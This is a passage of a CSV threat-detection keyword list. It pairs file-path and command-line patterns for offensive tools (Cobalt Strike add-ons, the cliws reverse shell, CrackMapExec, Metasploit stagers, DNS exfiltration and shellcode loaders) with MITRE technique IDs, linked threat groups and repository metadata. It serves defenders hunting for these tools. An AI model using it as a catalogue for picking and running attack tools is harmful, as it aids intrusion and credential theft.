XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","6074"
"*/clipboardinject/*",".{0,1000}\/clipboardinject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","6075"
"*/ClipboardMITM.py*",".{0,1000}\/ClipboardMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","6076"
"*/clipmon/clipmon.sln*",".{0,1000}\/clipmon\/clipmon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6077"
"*/clipmon/dll/*",".{0,1000}\/clipmon\/dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","6078"
"*/cliws -l *",".{0,1000}\/cliws\s\-l\s.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","6079"
"*/cliws -l 1000*",".{0,1000}\/cliws\s\-l\s1000.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","6080"
"*/cliws -p *",".{0,1000}\/cliws\s\-p\s.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","6081"
"*/cliws.exe*",".{0,1000}\/cliws\.exe.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","1","N/A","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","6082"
"*/cliws.git*",".{0,1000}\/cliws\.git.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","1","N/A","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","6083"
"*/CloakNDaggerC2*",".{0,1000}\/CloakNDaggerC2.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","N/A","10","10","17","3","2024-10-09T15:36:46Z","2023-04-28T01:58:18Z","6084"
"*/clock-skew.nse*",".{0,1000}\/clock\-skew\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6085"
"*/cloud_enum.git*",".{0,1000}\/cloud_enum\.git.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","6087"
"*/cloud_enum.py*",".{0,1000}\/cloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","6088"
"*/cloud_enum.txt*",".{0,1000}\/cloud_enum\.txt.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","6089"
"*/cloudbrute.yaml*",".{0,1000}\/cloudbrute\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","6090"
"*/cloudsploit.git*",".{0,1000}\/cloudsploit\.git.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","6095"
"*/clown-newuser.c*",".{0,1000}\/clown\-newuser\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","6096"
"*/CLR-Injection.git*",".{0,1000}\/CLR\-Injection\.git.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","6097"
"*/CLR-Injection_x64.bat*",".{0,1000}\/CLR\-Injection_x64\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","6098"
"*/CLR-Injection_x86.bat*",".{0,1000}\/CLR\-Injection_x86\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","6099"
"*/cmd/c2.go*",".{0,1000}\/cmd\/c2\.go.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","6100"
"*/cmd/hades/*",".{0,1000}\/cmd\/hades\/.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","1","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","6101"
"*/cmd/pico/ssh*",".{0,1000}\/cmd\/pico\/ssh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#linux","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","6102"
"*/cmd/reverst/*",".{0,1000}\/cmd\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","6103"
"*/cmd/sish.go*",".{0,1000}\/cmd\/sish\.go.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","6104"
"*/cmd_executor/*.go*",".{0,1000}\/cmd_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","6106"
"*/cmd_log.txt*",".{0,1000}\/cmd_log\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6107"
"*/cmd_stager*",".{0,1000}\/cmd_stager.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6108"
"*/CmdLineSpoofer.git*",".{0,1000}\/CmdLineSpoofer\.git.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","6109"
"*/CmdLineSpoofer/*.cs*",".{0,1000}\/CmdLineSpoofer\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","6110"
"*/cmdstager/*",".{0,1000}\/cmdstager\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6111"
"*/cme smb *",".{0,1000}\/cme\ssmb\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","#linux","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","6112"
"*/cme winrm *",".{0,1000}\/cme\swinrm\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","#linux","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","6113"
"*/cme_adcs_output_*.txt*",".{0,1000}\/cme_adcs_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6114"
"*/cme_shares_output_*",".{0,1000}\/cme_shares_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6115"
"*/cme_spooler_output_*",".{0,1000}\/cme_spooler_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6116"
"*/cmedb",".{0,1000}\/cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","6117"
"*/CMLoot.git*",".{0,1000}\/CMLoot\.git.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","6118"
"*/CMLoot.ps1*",".{0,1000}\/CMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","6119"
"*/CMSeek*",".{0,1000}\/CMSeek.{0,1000}","offensive_tool_keyword","CMSeek","CMS Detection and Exploitation suite - Scan WordPress. Joomla. Drupal and 130 other CMSs.","T1553 - T1580 - T1583 - T1584 ","TA0007","N/A","N/A","Vulnerability Scanner","https://github.com/Tuhinshubhra/CMSeek","1","0","N/A","N/A","N/A","10","2409","507","2024-04-09T13:40:52Z","2018-06-14T00:15:51Z","6120"
"*/cmstp_uac.ahk*",".{0,1000}\/cmstp_uac\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6121"
"*/CN=dnsKIRE.local*",".{0,1000}\/CN\=dnsKIRE\.local.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6122"
"*/cna/pipetest.cna*",".{0,1000}\/cna\/pipetest\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","6123"
"*/co2-cewler/*",".{0,1000}\/co2\-cewler\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","6124"
"*/co2-core/*",".{0,1000}\/co2\-core\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","6125"
"*/co2-laudanum/*",".{0,1000}\/co2\-laudanum\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","6126"
"*/co2-sqlmapper/*",".{0,1000}\/co2\-sqlmapper\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","6127"
